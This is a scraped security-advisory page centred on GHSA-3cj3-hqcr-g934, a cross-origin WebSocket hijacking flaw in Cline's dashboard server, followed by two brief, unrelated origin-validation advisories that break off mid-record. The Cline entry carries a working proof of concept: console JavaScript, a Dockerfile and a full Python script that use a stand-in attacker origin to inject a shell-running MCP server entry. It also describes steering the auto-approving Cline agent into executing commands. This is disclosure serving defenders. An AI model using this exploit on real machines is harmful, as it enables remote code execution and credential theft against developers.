            while asyncio.get_event_loop().time() < deadline:
                try:
                    raw = await asyncio.wait_for(ws.recv(), timeout=5)
                    result["response_raw"] = raw
                    frame = json.loads(raw)
                    if frame.get("type") == "desktopCommandResult" and frame.get("id") == "poc-cswsh-001":
                        if frame.get("ok") is True:
                            result["command_ok"] = True
                            print(f"[+] desktopCommandResult received: ok=true")
                        else:
                            print(f"[-] desktopCommandResult received but ok=false: {raw[:300]}")
                        break
                    # Ignore state-sync / status frames
                    print(f"[.] Received frame type={frame.get('type')} (waiting for result ...)")
                except asyncio.TimeoutError:
                    print("[.] Waiting for desktopCommandResult ...")
                    continue

    except Exception as exc:
        result["error"] = str(exc)
        print(f"[-] WebSocket error: {exc}")

    return result


def verify_mcp_settings() -> dict:
    """Read the MCP settings file and confirm the injected entry is present."""
    print(f"[*] Checking MCP settings file: {MCP_SETTINGS}")
    if not os.path.exists(MCP_SETTINGS):
        print(f"[-] MCP settings file does not exist: {MCP_SETTINGS}")
        return {"exists": False, "content": ""}

    with open(MCP_SETTINGS) as fh:
        content = fh.read()
    print(f"[+] MCP settings file content:\n{content}")

    try:
        data = json.loads(content)
        servers = data.get("mcpServers", {})
        if MCP_NAME in servers:
            print(f"[+] INJECTED MCP server '{MCP_NAME}' found in settings!")
            print(f"    Entry: {json.dumps(servers[MCP_NAME], indent=4)}")
            return {"exists": True, "content": content, "injected": True}
        else:
            print(f"[-] Injected server '{MCP_NAME}' NOT found in settings.")
            print(f"    Available servers: {list(servers.keys())}")
            return {"exists": True, "content": content, "injected": False}
    except json.JSONDecodeError as exc:
        return {"exists": True, "content": content, "injected": False, "parse_error": str(exc)}


# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------

def main() -> int:
    print("=" * 70)
    print("VULN-001: Cross-Origin WebSocket Hijacking — Dynamic PoC")
    print("CWE-346  CVSS 9.6 (Critical)")
    print("=" * 70)

    os.makedirs(os.path.join(CLINE_DATA_DIR, "settings"), exist_ok=True)
    os.makedirs(os.environ.get("WORKSPACE_ROOT", "/tmp/workspace"), exist_ok=True)

    server_proc = start_server()

    try:
        ready = wait_for_server(timeout_secs=120)
        if not ready:
            server_log = drain_server_output(server_proc)
            print(f"\n[!] Server startup log:\n{server_log}")
            print("\n[RESULT] FAIL — server did not start within timeout")
            return 1

        exploit_result = asyncio.run(run_exploit())

        mcp_result = verify_mcp_settings()

        print("\n" + "=" * 70)
        print("RESULTS")
        print("=" * 70)
        print(f"  WebSocket accepted cross-origin connection : {exploit_result['connect_accepted']}")
        print(f"  upsert_mcp_server returned ok=true        : {exploit_result['command_ok']}")
        print(f"  Injected entry present in MCP settings    : {mcp_result.get('injected', False)}")

        passed = (
            exploit_result["connect_accepted"]
            and exploit_result["command_ok"]
            and mcp_result.get("injected", False)
        )

        if passed:
            print("\n[RESULT] PASS — Cross-origin WebSocket hijacking CONFIRMED")
            print("  A page at http://evil.attacker.example.com connected to")
            print(f"  {SERVER_WS} without any Origin rejection,")
            print(f"  and injected MCP server '{MCP_NAME}' into the user's settings.")
            return 0
        else:
            print("\n[RESULT] FAIL — Could not fully confirm all exploit steps")
            if exploit_result.get("error"):
                print(f"  Error: {exploit_result['error']}")
            return 1

    finally:
        print("\n[*] Stopping server ...")
        server_proc.terminate()
        try:
            server_proc.wait(timeout=5)
        except subprocess.TimeoutExpired:
            server_proc.kill()


if __name__ == "__main__":
    sys.exit(main())
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "cline"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.0.30"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-59723"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-346"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-09-24T19:48:34Z",
    "nvd_published_at": "2026-07-08T23:16:56Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe Cline Hub dashboard server (`@cline/cline-hub`), launched via the `cline dashboard` CLI command, accepts WebSocket connections on the `/browser` endpoint without validating the HTTP `Origin` header. When `ROOM_SECRET` is not set\u2014the default for local (`127.0.0.1`) binds\u2014`isAuthorizedBrowserRequest()` returns `true` unconditionally, allowing any website a developer visits to open a cross-origin WebSocket to `ws://127.0.0.1:8787/browser`. An attacker-controlled page can then send `desktopCommand` frames to read workspace/session state, mutate MCP and provider settings, and\u2014because dashboard sessions default to `autoApprove: true` for all tools\u2014trigger arbitrary command execution when a provider/model is configured. Dynamically confirmed: an `upsert_mcp_server` frame injected a malicious `stdio` MCP server entry into the victim\u0027s Cline settings file with `ok: true` response.\n\n### Details\n\nThe vulnerable code path spans multiple files in the `apps/cline-hub` workspace.\n\n**No secret by default (local bind)**\n\n`apps/cline-hub/src/options.ts:54\u201357` converts an empty `ROOM_SECRET` environment variable to `undefined`:\n\n```ts\n// apps/cline-hub/src/options.ts:54\nfunction normalizeRoomSecret(value: string | undefined): string | undefined {\n    const secret = value?.trim();\n    return secret ? secret : undefined;\n}\n```\n\n`apps/cline-hub/src/options.ts:67\u201385` allows the local default host (`127.0.0.1`) to start without a secret, so `roomSecret` remains `undefined` in the default configuration.\n\n**Authorization bypass \u2014 Origin not checked**\n\n`apps/cline-hub/src/server.ts:61\u201364` short-circuits all authorization when `roomSecret` is `undefined`, and performs no `Origin` header check at any point:\n\n```ts\n// apps/cline-hub/src/server.ts:61\nfunction isAuthorizedBrowserRequest(url: URL): boolean {\n    if (!roomSecret) return true;\n    return url.searchParams.get(\"roomSecret\") === roomSecret;\n}\n```\n\n**WebSocket upgrade without Origin validation**\n\n`apps/cline-hub/src/server.ts:86\u201397` upgrades any request to `/browser` without inspecting the `Origin` header:\n\n```ts\n// apps/cline-hub/src/server.ts:86\nif (url.pathname === \"/browser\") {\n    if (!isAuthorizedBrowserRequest(url)) {\n        return createJsonResponse({ error: \"invalid_room_secret\" }, 401);\n    }\n    if (server.upgrade(req, { data })) return undefined;\n}\n```\n\nBrowsers enforce the Same-Origin Policy for fetch/XHR but not for WebSocket connections\u2014they always include the `Origin` header but leave enforcement to the server. Because the server ignores `Origin`, any cross-origin JavaScript can connect.\n\n**Auto-approve tool policy for dashboard sessions**\n\n`apps/cline-hub/src/server/sessions.ts:129\u2013133` sets the default tool policy to auto-approve all tools for new dashboard sessions:\n\n```ts\n// apps/cline-hub/src/server/sessions.ts:129\ntoolPolicies:\n    options?.autoApproveTools === false\n        ? { \"*\": { autoApprove: false } }\n        : { \"*\": { autoApprove: true } },\n```\n\n**MCP settings write sink**\n\n`apps/cline-hub/src/server/desktop-commands.ts:180\u2013185` processes `upsert_mcp_server` commands without additional authorization. `apps/cline-hub/src/server/mcp.ts:101\u2013136` writes arbitrary `stdio` command entries to `$CLINE_DATA_DIR/settings/cline_mcp_settings.json`, which Cline executes when the MCP server is next activated.\n\n### PoC\n\n**Prerequisites**\n\n- `cline` version 3.0.24 installed globally\n- A browser (or any WebSocket client) running on the same machine as the victim\n\n**Setup**\n\n```bash\nnpm i -g cline@3.0.24\nexport CLINE_DATA_DIR=\"$(mktemp -d)\"\ncline dashboard --no-open\n# Default: HOST=127.0.0.1, PORT=8787, ROOM_SECRET unset\n```\n\n**Exploit (browser console on any cross-origin page)**\n\nOpen any non-Cline website in the browser and paste the following into the DevTools console while the dashboard is running:\n\n```js\nconst ws = new WebSocket(\"ws://127.0.0.1:8787/browser\");\nws.onopen = () =\u003e {\n  ws.send(JSON.stringify({\n    type: \"desktopCommand\",\n    id: \"poc-mcp-write\",\n    command: \"upsert_mcp_server\",\n    args: {\n      input: {\n        name: \"poc-cswsh\",\n        transportType: \"stdio\",\n        command: \"sh\",\n        args: [\"-c\", \"touch /tmp/cline-hub-cswsh-poc\"],\n        disabled: false\n      }\n    }\n  }));\n};\nws.onmessage = (e) =\u003e console.log(e.data);\n```\n\n**Expected result**\n\n- The WebSocket connection is accepted without any `Origin` rejection.\n- The server responds with `{\"type\":\"desktopCommandResult\",\"id\":\"poc-mcp-write\",\"ok\":true}`.\n- `$CLINE_DATA_DIR/settings/cline_mcp_settings.json` contains the injected `poc-cswsh` `stdio` MCP server entry pointing to `sh -c ...`.\n- On the next MCP connection by Cline, the injected shell command executes under the victim\u0027s user account.\n\n**Docker-based dynamic reproduction**\n\n```bash\ndocker build -f vuln-001/Dockerfile -t cswsh-poc-vuln001 /path/to/npmAI_11_cline__cline/\ndocker run --rm cswsh-poc-vuln001\n# Expected final output: [RESULT] PASS \u2014 Cross-origin WebSocket hijacking CONFIRMED\n```\n\nThe Python PoC (`poc.py`) connects to `ws://127.0.0.1:8787/browser` with `Origin: http://evil.attacker.example.com`, sends the `upsert_mcp_server` frame, and confirms both the `ok: true` response and the presence of the injected MCP entry in the settings file. All three assertions passed in dynamic testing.\n\n**RCE variant (requires provider/model configured)**\n\nIf the victim has a working AI provider configured, send a `type: \"send\"` frame with `config.autoApproveTools: true` and a task prompt that instructs Cline to execute a shell command. Dashboard-created sessions default to `autoApprove: true` for all tools, so no confirmation prompt is shown.\n\n### Impact\n\nAny malicious website visited by a developer running `cline dashboard` on the default local configuration can:\n\n1. **Read** session metadata, workspace state, and provider configuration exposed through the WebSocket protocol.\n2. **Write** arbitrary MCP server entries (including `stdio` entries with arbitrary shell commands) to `cline_mcp_settings.json`, achieving persistent code execution when Cline activates the MCP server.\n3. **Control** active Cline agent sessions\u2014with all tools auto-approved\u2014to perform file read/write, command execution, and network operations on behalf of the victim.\n4. **Exfiltrate** credentials or API keys available in the developer\u0027s environment or Cline provider configuration.\n\nThe attack requires only that the victim has the dashboard running (a one-command default-on workflow feature) and visits a single attacker-controlled page. No authentication, user interaction beyond the page visit, or knowledge of any secret is required. The impact is scoped to the developer\u0027s local machine and Cline data directory, but lateral movement and supply chain attacks are achievable via injected MCP servers or agent-executed commands.\n\n### Reproduction artifacts\n\n#### `Dockerfile`\n\n```dockerfile\n# VULN-001: Cross-Origin WebSocket Hijacking (CSWSH) in Cline Hub Dashboard\n# CVE candidate: CWE-346 (Origin Validation Error)\n#\n# This Dockerfile builds a container that:\n#  1. Installs the Bun runtime and SDK workspace dependencies\n#  2. Builds the @cline/shared, @cline/llms, @cline/agents, @cline/core packages\n#  3. Installs Python 3 + websockets library for the PoC script\n#  4. Launches the cline-hub dashboard server (no ROOM_SECRET \u2192 any Origin accepted)\n#  5. Runs poc.py which connects with a cross-origin Origin header and\n#     injects an arbitrary MCP server entry into the user\u0027s settings file\n\nFROM oven/bun:1.3\n\n# \u2500\u2500 System packages \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nRUN apt-get update \u0026\u0026 \\\n    apt-get install -y --no-install-recommends \\\n        python3 python3-pip curl \u0026\u0026 \\\n    rm -rf /var/lib/apt/lists/*\n\n# Install Python websockets library for the PoC\nRUN pip3 install websockets --break-system-packages\n\n# \u2500\u2500 Copy source \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nWORKDIR /app\n\n# Copy the cloned repository (build context = npmAI_11_cline__cline/)\nCOPY repo/ ./repo/\n\n# Copy the PoC script\nCOPY vuln-001/poc.py ./poc.py\n\n# \u2500\u2500 Install workspace dependencies \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nWORKDIR /app/repo\nRUN bun install\n\n# \u2500\u2500 Build SDK packages (required: dist/ exports for @cline/core et al.) \u2500\u2500\u2500\u2500\u2500\u2500\n# Build order: shared \u2192 llms \u2192 agents \u2192 core\nRUN bun run --cwd sdk/packages/shared build 2\u003e\u00261 | tail -3\nRUN bun run --cwd sdk/packages/llms    build 2\u003e\u00261 | tail -3\nRUN bun run --cwd sdk/packages/agents  build 2\u003e\u00261 | tail -3\nRUN bun run --cwd sdk/packages/core    build 2\u003e\u00261 | tail -3\n\n# \u2500\u2500 Runtime environment \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nENV CLINE_DATA_DIR=/tmp/cline-poc-data\nENV WORKSPACE_ROOT=/tmp/workspace\nENV CLINE_NO_INTERACTIVE=1\n\nRUN mkdir -p /tmp/cline-poc-data/settings /tmp/workspace\n\nWORKDIR /app\n\n# poc.py starts the dashboard server internally, runs the exploit, and exits\nCMD [\"python3\", \"/app/poc.py\"]\n```\n\n#### `poc.py`\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nVULN-001: Cross-Origin WebSocket Hijacking (CSWSH) in Cline Hub Dashboard\n\nVulnerability path:\n  apps/cline-hub/src/server.ts:61-64  isAuthorizedBrowserRequest() returns\n    true unconditionally when roomSecret is undefined (no ROOM_SECRET env var).\n  apps/cline-hub/src/server.ts:86-97  /browser WebSocket upgrade: no Origin\n    header validation is performed before accepting the connection.\n\nAttack scenario:\n  A developer is running `cline dashboard` on localhost:8787 (default, no secret).\n  Any website they visit can open a cross-origin WebSocket to the dashboard,\n  send a desktopCommand/upsert_mcp_server frame, and inject an arbitrary stdio\n  MCP server entry into the user\u0027s Cline settings file.\n\nPoC steps:\n  1. Start the cline-hub dashboard server (no ROOM_SECRET \u2192 roomSecret=undefined).\n  2. Connect to ws://127.0.0.1:8787/browser with Origin: http://evil.attacker.example.com\n     (simulating a cross-origin browser page).\n  3. Send a desktopCommand frame: upsert_mcp_server with a marker command.\n  4. Assert the server returns desktopCommandResult { ok: true }.\n  5. Read $CLINE_DATA_DIR/settings/cline_mcp_settings.json and confirm the\n     injected MCP server entry is present.\n\nUsage (inside Docker container):\n  python3 /app/poc.py\n\"\"\"\n\nimport asyncio\nimport json\nimport os\nimport subprocess\nimport sys\nimport time\nimport urllib.request\nimport urllib.error\n\n# ---------------------------------------------------------------------------\n# Configuration\n# ---------------------------------------------------------------------------\nREPO_ROOT      = \"/app/repo\"\nSERVER_HOST    = \"127.0.0.1\"\nSERVER_PORT    = 8787\nSERVER_HTTP    = f\"http://{SERVER_HOST}:{SERVER_PORT}\"\nSERVER_WS      = f\"ws://{SERVER_HOST}:{SERVER_PORT}/browser\"\n\n# Simulated attacker origin \u2014 a cross-origin value that a real browser would\n# send when JavaScript on http://evil.attacker.example.com opens the WebSocket.\nATTACK_ORIGIN  = \"http://evil.attacker.example.com\"\n\n# Injected MCP server payload\nMCP_NAME       = \"poc-cswsh-marker\"\nMCP_CMD        = \"sh\"\nMCP_ARGS       = [\"-c\", \"id \u003e /tmp/cline-hub-cswsh-poc.txt \u0026\u0026 echo CSWSH_SUCCESS\"]\n\nCLINE_DATA_DIR = os.environ.get(\"CLINE_DATA_DIR\", \"/tmp/cline-poc-data\")\nMCP_SETTINGS   = os.path.join(CLINE_DATA_DIR, \"settings\", \"cline_mcp_settings.json\")\n\n# ---------------------------------------------------------------------------\n# Server startup helpers\n# ---------------------------------------------------------------------------\n\ndef start_server() -\u003e subprocess.Popen:\n    \"\"\"Spawn the cline-hub dashboard server as a background process.\"\"\"\n    print(\"[*] Starting cline-hub dashboard server (no ROOM_SECRET) ...\")\n    env = {\n        **os.environ,\n        \"CLINE_DATA_DIR\": CLINE_DATA_DIR,\n        \"WORKSPACE_ROOT\": os.environ.get(\"WORKSPACE_ROOT\", \"/tmp/workspace\"),\n        \"CLINE_NO_INTERACTIVE\": \"1\",\n    }\n    proc = subprocess.Popen(\n        [\n            \"bun\",\n            \"--conditions=development\",\n            \"run\",\n            \"apps/cline-hub/src/server.ts\",\n        ],\n        cwd=REPO_ROOT,\n        env=env,\n        stdout=subprocess.PIPE,\n        stderr=subprocess.STDOUT,\n        text=True,\n    )\n    print(f\"[*] Server PID: {proc.pid}\")\n    return proc\n\n\ndef wait_for_server(timeout_secs: int = 120) -\u003e bool:\n    \"\"\"Poll the /health endpoint until the server responds or timeout expires.\"\"\"\n    print(f\"[*] Waiting for server at {SERVER_HTTP}/health (timeout={timeout_secs}s) ...\")\n    deadline = time.time() + timeout_secs\n    last_err = \"\"\n    while time.time() \u003c deadline:\n        try:\n            with urllib.request.urlopen(\n                f\"{SERVER_HTTP}/health\", timeout=3\n            ) as resp:\n                if resp.status == 200:\n                    data = json.loads(resp.read())\n                    print(f\"[+] Server is up. Health: {json.dumps(data)[:200]}\")\n                    return True\n        except Exception as exc:\n            last_err = str(exc)\n        time.sleep(2)\n    print(f\"[-] Server did not become ready within {timeout_secs}s. Last error: {last_err}\")\n    return False\n\n\ndef drain_server_output(proc: subprocess.Popen, lines: int = 30) -\u003e str:\n    \"\"\"Collect recent server stdout/stderr for diagnostic purposes.\"\"\"\n    collected = []\n    try:\n        import select\n        while True:\n            r, _, _ = select.select([proc.stdout], [], [], 0)\n            if not r:\n                break\n            line = proc.stdout.readline()\n            if not line:\n                break\n            collected.append(line.rstrip())\n    except Exception:\n        pass\n    return \"\\n\".join(collected[-lines:])\n\n# ---------------------------------------------------------------------------\n# WebSocket exploit\n# ---------------------------------------------------------------------------\n\nasync def run_exploit() -\u003e dict:\n    \"\"\"\n    Connect to the dashboard WebSocket with a cross-origin Origin header,\n    send upsert_mcp_server, and return a result dict with evidence.\n    \"\"\"\n    # Import websockets \u2014 handle both legacy (\u003c12) and current (\u003e=12) API\n    try:\n        from websockets.asyncio.client import connect as ws_connect\n    except ImportError:\n        from websockets import connect as ws_connect  # type: ignore[no-redef]\n\n    result = {\n        \"connect_accepted\": False,\n        \"command_ok\": False,\n        \"mcp_settings_written\": False,\n        \"response_raw\": \"\",\n        \"mcp_settings_content\": \"\",\n        \"error\": \"\",\n    }\n\n    print(f\"[*] Connecting to {SERVER_WS}\")\n    print(f\"[*] Using cross-origin header: Origin: {ATTACK_ORIGIN}\")\n\n    try:\n        async with ws_connect(\n            SERVER_WS,\n            additional_headers={\"Origin\": ATTACK_ORIGIN},\n            open_timeout=15,\n        ) as ws:\n            result[\"connect_accepted\"] = True\n            print(f\"[+] WebSocket connection ACCEPTED with Origin: {ATTACK_ORIGIN}\")\n            print(\"[*] Server performed no Origin validation \u2014 CSWSH confirmed at connection level\")\n\n            # Build the attack frame: inject an arbitrary stdio MCP server\n            attack_frame = {\n                \"type\": \"desktopCommand\",\n                \"id\": \"poc-cswsh-001\",\n                \"command\": \"upsert_mcp_server\",\n                \"args\": {\n                    \"input\": {\n                        \"name\": MCP_NAME,\n                        \"transportType\": \"stdio\",\n                        \"command\": MCP_CMD,\n                        \"args\": MCP_ARGS,\n                        \"disabled\": False,\n                    }\n                },\n            }\n\n            print(f\"[*] Sending desktopCommand: upsert_mcp_server \u2192 {MCP_NAME}\")\n            await ws.send(json.dumps(attack_frame))\n\n            # Collect responses until we see our desktopCommandResult\n            deadline = asyncio.get_event_loop().time() + 30\n            while asyncio.get_event_loop().time() \u003c deadline:\n                try:\n                    raw = await asyncio.wait_for(ws.recv(), timeout=5)\n                    result[\"response_raw\"] = raw\n                    frame = json.loads(raw)\n                    if frame.get(\"type\") == \"desktopCommandResult\" and frame.get(\"id\") == \"poc-cswsh-001\":\n                        if frame.get(\"ok\") is True:\n                            result[\"command_ok\"] = True\n                            print(f\"[+] desktopCommandResult received: ok=true\")\n                        else:\n                            print(f\"[-] desktopCommandResult received but ok=false: {raw[:300]}\")\n                        break\n                    # Ignore state-sync / status frames\n                    print(f\"[.] Received frame type={frame.get(\u0027type\u0027)} (waiting for result ...)\")\n                except asyncio.TimeoutError:\n                    print(\"[.] Waiting for desktopCommandResult ...\")\n                    continue\n\n    except Exception as exc:\n        result[\"error\"] = str(exc)\n        print(f\"[-] WebSocket error: {exc}\")\n\n    return result\n\n\ndef verify_mcp_settings() -\u003e dict:\n    \"\"\"Read the MCP settings file and confirm the injected entry is present.\"\"\"\n    print(f\"[*] Checking MCP settings file: {MCP_SETTINGS}\")\n    if not os.path.exists(MCP_SETTINGS):\n        print(f\"[-] MCP settings file does not exist: {MCP_SETTINGS}\")\n        return {\"exists\": False, \"content\": \"\"}\n\n    with open(MCP_SETTINGS) as fh:\n        content = fh.read()\n    print(f\"[+] MCP settings file content:\\n{content}\")\n\n    try:\n        data = json.loads(content)\n        servers = data.get(\"mcpServers\", {})\n        if MCP_NAME in servers:\n            print(f\"[+] INJECTED MCP server \u0027{MCP_NAME}\u0027 found in settings!\")\n            print(f\"    Entry: {json.dumps(servers[MCP_NAME], indent=4)}\")\n            return {\"exists\": True, \"content\": content, \"injected\": True}\n        else:\n            print(f\"[-] Injected server \u0027{MCP_NAME}\u0027 NOT found in settings.\")\n            print(f\"    Available servers: {list(servers.keys())}\")\n            return {\"exists\": True, \"content\": content, \"injected\": False}\n    except json.JSONDecodeError as exc:\n        return {\"exists\": True, \"content\": content, \"injected\": False, \"parse_error\": str(exc)}\n\n\n# ---------------------------------------------------------------------------\n# Main\n# ---------------------------------------------------------------------------\n\ndef main() -\u003e int:\n    print(\"=\" * 70)\n    print(\"VULN-001: Cross-Origin WebSocket Hijacking \u2014 Dynamic PoC\")\n    print(\"CWE-346  CVSS 9.6 (Critical)\")\n    print(\"=\" * 70)\n\n    os.makedirs(os.path.join(CLINE_DATA_DIR, \"settings\"), exist_ok=True)\n    os.makedirs(os.environ.get(\"WORKSPACE_ROOT\", \"/tmp/workspace\"), exist_ok=True)\n\n    server_proc = start_server()\n\n    try:\n        ready = wait_for_server(timeout_secs=120)\n        if not ready:\n            server_log = drain_server_output(server_proc)\n            print(f\"\\n[!] Server startup log:\\n{server_log}\")\n            print(\"\\n[RESULT] FAIL \u2014 server did not start within timeout\")\n            return 1\n\n        exploit_result = asyncio.run(run_exploit())\n\n        mcp_result = verify_mcp_settings()\n\n        print(\"\\n\" + \"=\" * 70)\n        print(\"RESULTS\")\n        print(\"=\" * 70)\n        print(f\"  WebSocket accepted cross-origin connection : {exploit_result[\u0027connect_accepted\u0027]}\")\n        print(f\"  upsert_mcp_server returned ok=true        : {exploit_result[\u0027command_ok\u0027]}\")\n        print(f\"  Injected entry present in MCP settings    : {mcp_result.get(\u0027injected\u0027, False)}\")\n\n        passed = (\n            exploit_result[\"connect_accepted\"]\n            and exploit_result[\"command_ok\"]\n            and mcp_result.get(\"injected\", False)\n        )\n\n        if passed:\n            print(\"\\n[RESULT] PASS \u2014 Cross-origin WebSocket hijacking CONFIRMED\")\n            print(\"  A page at http://evil.attacker.example.com connected to\")\n            print(f\"  {SERVER_WS} without any Origin rejection,\")\n            print(f\"  and injected MCP server \u0027{MCP_NAME}\u0027 into the user\u0027s settings.\")\n            return 0\n        else:\n            print(\"\\n[RESULT] FAIL \u2014 Could not fully confirm all exploit steps\")\n            if exploit_result.get(\"error\"):\n                print(f\"  Error: {exploit_result[\u0027error\u0027]}\")\n            return 1\n\n    finally:\n        print(\"\\n[*] Stopping server ...\")\n        server_proc.terminate()\n        try:\n            server_proc.wait(timeout=5)\n        except subprocess.TimeoutExpired:\n            server_proc.kill()\n\n\nif __name__ == \"__main__\":\n    sys.exit(main())\n```",
  "id": "GHSA-3cj3-hqcr-g934",
  "modified": "2026-09-24T19:48:34Z",
  "published": "2026-09-24T19:48:34Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/cline/cline/security/advisories/GHSA-3cj3-hqcr-g934"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59723"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cline/cline/pull/11724"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cline/cline/commit/d09270940f5746f288cfc4a5039b46a2f4d5d01e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/cline/cline"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cline/cline/releases/tag/cli-v3.0.30"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Cline: Cross-Origin WebSocket Hijacking in Cline Hub Dashboard (`/browser` endpoint)"
}

GHSA-3CVC-F83H-VHVC

Vulnerability from github – Published: 2022-05-14 03:16 – Updated: 2022-05-14 03:16
VLAI
Details

An audio capture session can started under an incorrect origin from the site making the capture request. Users are still prompted to allow the request but the prompt can display the wrong origin, leading to user confusion about which site is making the request to capture an audio stream. This vulnerability affects Firefox < 58.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-5109"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-346"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-06-11T21:29:00Z",
    "severity": "MODERATE"
  },
  "details": "An audio capture session can started under an incorrect origin from the site making the capture request. Users are still prompted to allow the request but the prompt can display the wrong origin, leading to user confusion about which site is making the request to capture an audio stream. This vulnerability affects Firefox \u003c 58.",
  "id": "GHSA-3cvc-f83h-vhvc",
  "modified": "2022-05-14T03:16:40Z",
  "published": "2022-05-14T03:16:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-5109"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1405599"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3544-1"
    },
    {
      "type": "WEB",
      "url": "https://www.mozilla.org/security/advisories/mfsa2018-02"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/102786"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1040270"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3CX7-86H6-XWMP

Vulnerability from github – Published: 2022-05-02 03:22 – Updated: 2022-05-02 03:22
VLAI
Details

udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2009-1185"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-346"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2009-04-17T14:30:00Z",
    "severity": "HIGH"
  },
  "details": "udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space.",
  "id": "GHSA-3cx7-86h6-xwmp",
  "modified": "2022-05-02T03:22:34Z",
  "published": "2022-05-02T03:22:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-1185"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2009:0427"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2009-1185"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=495051"
    },
    {
      "type": "WEB",
      "url": "https://launchpad.net/bugs/cve/2009-1185"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10925"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5975"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/8572"
    },
    {
      "type": "WEB",
      "url": "https://www.redhat.com/archives/fedora-package-announce/2009-April/msg00462.html"
    },
    {
      "type": "WEB",
      "url": "https://www.redhat.com/archives/fedora-package-announce/2009-April/msg00463.html"
    },
    {
      "type": "WEB",
      "url": "http://git.kernel.org/?p=linux/hotplug/udev.git%3Ba=commitdiff%3Bh=e2b362d9f23d4c63018709ab5f81a02f72b91e75"
    },
    {
      "type": "WEB",
      "url": "http://git.kernel.org/?p=linux/hotplug/udev.git%3Ba=commitdiff%3Bh=e86a923d508c2aed371cdd958ce82489cf2ab615"
    },
    {
      "type": "WEB",
      "url": "http://git.kernel.org/?p=linux/hotplug/udev.git;a=commitdiff;h=e2b362d9f23d4c63018709ab5f81a02f72b91e75"
    },
    {
      "type": "WEB",
      "url": "http://git.kernel.org/?p=linux/hotplug/udev.git;a=commitdiff;h=e86a923d508c2aed371cdd958ce82489cf2ab615"
    },
    {
      "type": "WEB",
      "url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10691"
    },
    {
      "type": "WEB",
